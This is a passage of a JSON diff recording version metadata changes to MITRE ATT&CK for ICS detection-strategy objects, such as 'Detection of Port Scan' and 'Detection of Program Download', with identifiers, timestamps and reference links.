+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--442e5dcf-7f41-4ba5-ba89-aefb0d1c63cf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0776",
+                            "external_id": "DET0776"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Modify Parameter",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--48d2023b-469d-4f9f-a4e6-010be72436b9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7f41ed29-fdc6-4c28-ba10-9de1aa129f7e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0783",
+                            "external_id": "DET0783"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Modify Program",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--882f2365-4c14-4c48-8eef-2a7c293c8569"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e69d1e15-76e1-434c-bd45-0354a10dde8a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0790",
+                            "external_id": "DET0790"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Module Firmware",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--880a1133-6639-42f0-96a8-3e914426d38b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--60a55b7b-29a5-437e-83a7-edbe6f3c4415",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0727",
+                            "external_id": "DET0727"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Monitor Process State",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1be515a0-2656-4b35-a561-e8157169350d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--56bf71a3-a28b-4a8f-84ed-3a71449d47c0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 20:46:31.212000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0909",
+                            "external_id": "DET0909"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Multicast Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--67861309-0ba7-4713-843e-3def87e396ec"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-22 20:46:31.212000+00:00\", \"old_value\": \"2026-04-22T20:46:31.212Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:30:28.263Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5ba60cf7-738d-4ed4-827c-8c763ad9f0f0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0753",
+                            "external_id": "DET0753"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Native API",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--aebd2848-98db-46f1-8e22-627e2ec3c280"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--441ded70-7e25-47f1-b55c-0fafb7d4f44c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0770",
+                            "external_id": "DET0770"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Network Connection Enumeration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7aa60595-5a1c-4de2-be60-cc1f9fea2313"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f4f3b9a6-2de0-45a5-8936-2ad9288191b9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0800",
+                            "external_id": "DET0800"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Network Sniffing",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--28eb77c1-1834-4b7a-a06f-afebb7f2e756"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c1645705-a26f-45b2-aa68-ff5c93dfc0f4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 00:43:15.974000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0915",
+                            "external_id": "DET0915"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Online Edit",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--22b202f2-d4dd-44dd-b5e1-791ff2aef8ed"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-23 00:43:15.974000+00:00\", \"old_value\": \"2026-04-23T00:43:15.974Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:30:40.347Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5604323b-6e7a-4801-91ae-4bf591f2e3ac",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0788",
+                            "external_id": "DET0788"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Point & Tag Identification",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--484023ea-6fea-4f91-b40d-c6d87188cbfe"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6bdde391-76eb-4bd7-9e19-e805ab98b7ac",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 18:52:19.941000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0907",
+                            "external_id": "DET0907"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Port Scan",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--51a094bf-b7eb-452a-9b7a-ffac16fce1ac"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-22 18:52:19.941000+00:00\", \"old_value\": \"2026-04-22T18:52:19.941Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:30:52.373Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e90f1c0c-f2c5-4fe1-942f-411574df043f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 00:32:34.211000+00:00",
+                    "modified": "2026-05-12 16:30:18.391000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0914",
+                            "external_id": "DET0914"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Program Append",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3c6aa6f7-29e9-41d9-8500-30b6d0533d64"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-23 00:32:34.211000+00:00\", \"old_value\": \"2026-04-23T00:32:34.211Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.391000+00:00\", \"old_value\": \"2026-04-24T20:31:02.396Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--709e05b2-6400-43a2-9bbf-b64f6017b023",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0752",
+                            "external_id": "DET0752"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Program Download",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b74100d1-0085-468a-834a-2bf10924a3b7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2e99cd65-aad4-4796-9013-79837d498eb6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 00:09:43.016000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0913",
+                            "external_id": "DET0913"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Program Download All",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e379be82-39d7-4ae4-8557-f846ba19cd4b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-23 00:09:43.016000+00:00\", \"old_value\": \"2026-04-23T00:09:43.016Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:31:14.045Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6f921aa8-deb3-4286-8101-26a7cbe80c0e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0761",
+                            "external_id": "DET0761"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Program Upload",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3c6a21cb-8643-41bc-94a1-e860b02a1cad"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--09754c36-7be2-4536-aad2-a6c3568ba0e5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0766",
+                            "external_id": "DET0766"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Project File Infection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6e046c4c-6c93-4fdf-a69e-5d81b52d1e9c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--74b96bd4-dab9-494e-a540-b7c998581fd5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0804",
+                            "external_id": "DET0804"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Remote Services",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--058d856a-6356-402f-b3ff-a7c1b6186921"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ec442b22-3dc8-4b2b-8294-b76b0f01d748",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0739",
+                            "external_id": "DET0739"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Remote System Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--322ac45b-d540-4d2a-84a1-cde200238b95"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--636329e6-32b9-4a71-acf8-ae6d01a6b4ef",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0787",
+                            "external_id": "DET0787"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
